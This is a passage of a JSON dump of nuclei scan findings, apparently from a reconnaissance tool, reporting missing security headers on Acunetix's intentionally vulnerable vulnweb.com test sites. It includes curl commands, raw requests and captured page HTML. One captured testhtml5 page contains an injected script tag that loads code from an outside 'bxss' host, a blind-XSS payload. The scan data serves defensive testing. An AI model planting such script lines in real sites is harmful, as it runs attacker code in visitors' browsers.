Microsoft-IIS/8.5\r\nX-Powered-By: ASP.NET\r\n\r\n<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">\r\n<html xmlns="http://www.w3.org/1999/xhtml">\r\n<head>\r\n<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>\r\n<title>404 - File or directory not found.</title>\r\n<style type="text/css">\r\n<!--\r\nbody{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}\r\nfieldset{padding:0 15px 10px 15px;} \r\nh1{font-size:2.4em;margin:0;color:#FFF;}\r\nh2{font-size:1.7em;margin:0;color:#CC0000;} \r\nh3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} \r\n#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;\r\nbackground-color:#555555;}\r\n#content{margin:0 0 0 2%;position:relative;}\r\n.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}\r\n-->\r\n</style>\r\n</head>\r\n<body>\r\n<div id="header"><h1>Server Error</h1></div>\r\n<div id="content">\r\n <div class="content-container"><fieldset>\r\n <h2>404 - File or directory not found.</h2>\r\n <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>\r\n </fieldset></div>\r\n</div>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 346, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "clear-site-data", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/604.5.2 (KHTML, like Gecko) Version/9.1.2 Safari/604.5.2' 'http://testphp.vulnweb.com/.idea/.name'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/.idea/.name", + "discovered_date": "2024-11-13T02:40:53.126Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /.idea/.name HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/604.5.2 (KHTML, like Gecko) Version/9.1.2 Safari/604.5.2\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 6\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nEtag: "4f911cd6-6"\r\nLast-Modified: Fri, 20 Apr 2012 08:22:46 GMT\r\nServer: nginx/1.19.0\r\n\r\nacuart", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 347, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-content-type-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46' 'http://testhtml5.vulnweb.com'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com", + "discovered_date": "2024-11-13T02:40:53.256Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET / HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nAccess-Control-Allow-Origin: *\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html>\n<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">\n<head>\n <meta charset="utf-8">\n <title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title>\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <meta name="description" content="">\n <meta name="author" content="">\n\n <!-- Le styles -->\n <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">\n <link href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'>\n <link href="/static/css/style.css" rel="stylesheet">\n\n <link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico">\n\n <style type="text/css">\n body {\n padding-top: 60px;\n padding-bottom: 40px;\n }\n .sidebar-nav {\n padding: 9px 0;\n }\n\n @media (max-width: 980px) {\n /* Enable use of floated navbar text */\n .navbar-text.pull-right {\n float: none;\n padding-left: 5px;\n padding-right: 5px;\n }\n }\n </style>\n</head>\n\n<body>\n\n<div class="navbar navbar-fixed-top">\n <div class="navbar-inner">\n <div class="container-fluid">\n <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n </button>\n <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security">&nbsp;&nbsp;&nbsp;&nbsp;</a>\n <p class="navbar-text pull-left">\n Vulnerable HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.\n </p>\n\n <p class="navbar-text pull-right">\n \n <a href="#myModal" role="button" class="btn" data-toggle="modal">Login</a>\n \n </p>\n </div>\n </div>\n</div>\n\n<div class="container-fluid">\n <div class="row-fluid">\n <div class="span2">\n <div class="well sidebar-nav">\n <ul class="nav nav-list">\n <li class="nav-header">Views</li>\n <li id="popularLi" class="active"><a href="#/popular">Popular</a></li>\n <li><a href="#/latest">Latest</a></li>\n <li><a href="#/carousel">Carousel</a></li>\n <li><a href="#/archive">Archive</a></li>\n\n <li class="nav-header">Website</li>\n <li><a href="#/about">About</a></li>\n <li><a href="#/contact">Contact</a></li>\n\n <li class="nav-header">Acunetix</li>\n <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>\n <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>\n <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>\n <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>\n </ul>\n </div><!--/.well -->\n </div><!--/span-->\n <div class="span10">\n <div class="row-fluid">\n <div ng-view></div>\n </div><!--/row-->\n </div><!--/span-->\n </div><!--/row-->\n\n <hr>\n\n <div class="row-fluid">\n <div class="pull-left" style="font-size: xx-small;" id="refId"></div>\n </div>\n\t\n\t<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">\n\t\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>\n\t</div>\n\n <footer>\n <p class="pull-left">&copy; Acunetix Ltd. 2019</p>\n </footer>\n\n</div><!--/.fluid-container-->\n\n\n<!-- Modal -->\n<div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">\n <form class="modal-body" action="/login" method="POST" id="loginForm">\n <div class="modal-header">\n <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>\n <h3 id="myModalLabel">Login</h3>\n </div>\n <div class="modal-body">\n <div class="control-group">\n <!-- Username -->\n <label class="control-label" for="username">Username</label>\n <div class="controls">\n <input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin">\n </div>\n </div>\n\n <div class="control-group">\n <!-- Password-->\n <label class="control-label" for="password">Password</label>\n <div class="controls">\n <input type="password" id="password" name="password" placeholder="" class="input-xlarge">\n </div>\n </div>\n\n <div class="control-group">\n <a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a>\n </div>\n\n </div>\n <div class="modal-footer">\n <button class="btn btn-primary" id="loginFormSubmit">Login</button>\n <button class="btn" data-dismiss="modal" aria-hidden="true">Close</button>\n </div>\n </form>\n</div>\n\n<!-- Le javascript\n================================================== -->\n<!-- Placed at the end of the document so the pages load faster -->\n<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>\n<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>\n<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>\n\n<!-- App libs -->\n\n<script src="/static/app/app.js"></script>\n<script src="/static/app/libs/sessvars.js"></script>\n<script src="/static/app/post.js"></script>\n<script src="/static/app/controllers/controllers.js"></script>\n<script src="/static/app/services/itemsService.js"></script>\n<script src="http://bxss.s3.amazonaws.com/ad.js"></script>\n\n\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 348, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 76, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "content-security-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Safari/605.1.15' 'http://testaspnet.vulnweb.com'", + "type": "http", + "http_url": "http://testaspnet.vulnweb.com", + "discovered_date": "2024-11-13T02:40:53.386Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET / HTTP/1.1\r\nHost: testaspnet.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 14069\r\nCache-Control: private\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:45 GMT\r\nServer: Microsoft-IIS/8.5\r\nSet-Cookie: ASP.NET_SessionId=vmit32btaeasjnawkbexxh55; path=/; HttpOnly\r\nX-Aspnet-Version: 2.0.50727\r\nX-Powered-By: ASP.NET\r\n\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >\r\n<HTML>\r\n\t<HEAD>\r\n\t\t<title>acublog news</title>\r\n\t\t<META http-equiv="Content-Type" content="text/html; charset=windows-1252">\r\n\t\t<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">\r\n\t\t<meta content="C#" name="CODE_LANGUAGE">\r\n\t\t<meta content="JavaScript" name="vs_defaultClientScript">\r\n\t\t<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">\r\n\t\t<LINK href="styles.css" type="text/css" rel="stylesheet">\r\n\t</HEAD>\r\n\t<body>\r\n\t\t<form name="Form1" method="post" action="default.aspx" id="Form1">\r\n<div>\r\n<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />\r\n<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />\r\n<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" />\r\n</div>\r\n\r\n<script type="text/javascript">\r\n//<![CDATA[\r\nvar theForm = document.forms['Form1'];\r\nif (!theForm) {\r\n theForm = document.Form1;\r\n}\r\nfunction __doPostBack(eventTarget, eventArgument) {\r\n if (!theForm.onsubmit || (theForm.onsubmit() != false)) {\r\n theForm.__EVENTTARGET.value = eventTarget;\r\n theForm.__EVENTARGUMENT.value = eventArgument;\r\n theForm.submit();\r\n }\r\n}\r\n//]]>\r\n</script>\r\n\r\n\r\n<div>\r\n\r\n\t<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" />\r\n\t<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAKv3NmgDwKB48+iAgK20qX9DwK20qX9DwK20tmRBwK20tmRBwK20o35BQK20o35BQK20qGcDQK20qGcDQKL+bMFAov5swUCi/mn2AkCi/mn2AkCi/nb/AICi/nb/AICi/nPkwoCi/nPkwoCi/njtgMCi/njtgMCi/mXzQwCi/mXzQwCi/mL4AUCi/mL4AUCi/m/hw0Ci/m/hw0Ci/mT7AsCi/mT7AsCi/mHgwMCi/mHgwMCvJPzxAkCvJPzxAkCvJPnmwECvJPnmwECvJObvgoCvJObvgoCvJOP1QMCvJOP1QMCvJOj6AwCvJOj6AwCvJPXjAQCvJPXjAQCvJPLow0CvJPLow0CvJP/xgYCvJP/xgYCvJPTrwMCvJPTrwMCvJPHwgwCvJPHwgwCkbrR6w8CkbrR6w8CkbrFjgcCkbrFjgcCkbr5JQKRuvklApG67fgJApG67fgJApG6gZ8BApG6gZ8BApG6tbIKApG6tbIKApG6qckDApG6qckDApG63e0MApG63e0MApG6sdUJApG6sdUJApG6pegCApG6pegCAtTZ5J4HAtTZ5J4HAtTZmDUC1NmYNQLU2YzICQLU2YzICQLU2aDvAgLU2aDvAgLU2dSDCgLU2dSDCgLU2cimAwLU2cimAwLU2fz9DALU2fz9DALU2ZCQBALU2ZCQBBM7QfLxs46Xr8rthEeGdU4fr+Ig" />\r\n</div>\r\n\t\t\t\r\n<TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">\r\n\t<TR>\r\n\t\t<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>\r\n\t\t<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"\r\n\t\t\theight="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>\r\n\t</TR>\r\n</TABLE>\r\n<TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">\r\n\t<TR>\r\n\t\t<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>\r\n\t\t\t<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup">\r\n\t\t\t\tsignup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>\r\n\t\t\t\t<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>\r\n\t\t</TD>\r\n\t\t<td class="MenuBar" align="right" width="50px">\r\n\t\t\t<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>\r\n\t\t</td>\r\n\t</TR>\r\n</TABLE>\r\n\r\n\t\t\t<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">\r\n\t\t\t\t<TR>\r\n\t\t\t\t\t<TD id="tdPageData" valign="top">\r\n\t\t\t\t\t<DIV class="NewsDate">posted by <strong>admin </strong> on 5/16/2019 12:32:30 PM&nbsp;<a href="Comments.aspx?id=0" class="NewsOperation">(37) comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:37:35 AM&nbsp;<a href="Comments.aspx?id=3" class="NewsOperation">(37) comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:35:22 AM&nbsp;<a href="Comments.aspx?id=2" class="NewsOperation">(41) comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD>\r\n\r\n\t\t\t\t\t<TD vAlign="top" width="200">\r\n\t\t\t\t\t\t<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">\r\n\t<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">\r\n\t\t<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V9040')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">November 2024</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V9101')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>\r\n\t</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9066')" style="color:Black" title="October 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9067')" style="color:Black" title="October 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9068')" style="color:Black" title="October 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9069')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9070')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9071')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9072')" style="color:Black" title="November 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9073')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9074')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9075')" style="color:Black" title="November 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9076')" style="color:Black" title="November 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9077')" style="color:Black" title="November 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9078')" style="color:Black" title="November 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9079')" style="color:Black" title="November 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9080')" style="color:Black" title="November 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9081')" style="color:Black" title="November 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9082')" style="color:Black" title="November 12">12</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9083')" style="color:Black" title="November 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9084')" style="color:Black" title="November 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9085')" style="color:Black" title="November 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9086')" style="color:Black" title="November 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9087')" style="color:Black" title="November 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9088')" style="color:Black" title="November 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9089')" style="color:Black" title="November 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9090')" style="color:Black" title="November 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9091')" style="color:Black" title="November 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9092')" style="color:Black" title="November 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9093')" style="color:Black" title="November 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9094')" style="color:Black" title="November 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9095')" style="color:Black" title="November 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9096')" style="color:Black" title="November 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9097')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9098')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9099')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9100')" style="color:Black" title="November 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9101')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9102')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9103')" style="color:Black" title="December 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9104')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9105')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9106')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9107')" style="color:Black" title="December 07">7</a></td></tr>\r\n</table><BR>\r\n<a href="rssFeed.aspx">Get RSS feed</a>\r\n</TD>\r\n\t\t\t\t</TR>\r\n\t\t\t\t<TR>\r\n\t\t\t\t\t<TD colSpan="2">\r\n\t\t\t\t\t</TD>\r\n\t\t\t\t</TR>\r\n\t\t\t</TABLE>\r\n\t\t</form>\r\n\t</body>\r\n\t<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">\r\n\t\t<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>\r\n\t</div>\r\n</HTML>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 349, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "strict-transport-security", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15' 'http://testhtml5.vulnweb.com/static/css'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/static/css", + "discovered_date": "2024-11-13T02:40:53.518Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /static/css HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 403 Forbidden\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>403 Forbidden</title></head>\r\n<body>\r\n<center><h1>403 Forbidden</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 350, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 75, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-resource-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/604.1' 'http://testasp.vulnweb.com/T'", + "type": "http", + "http_url": "http://testasp.vulnweb.com/T", + "discovered_date": "2024-11-13T02:40:53.660Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /T 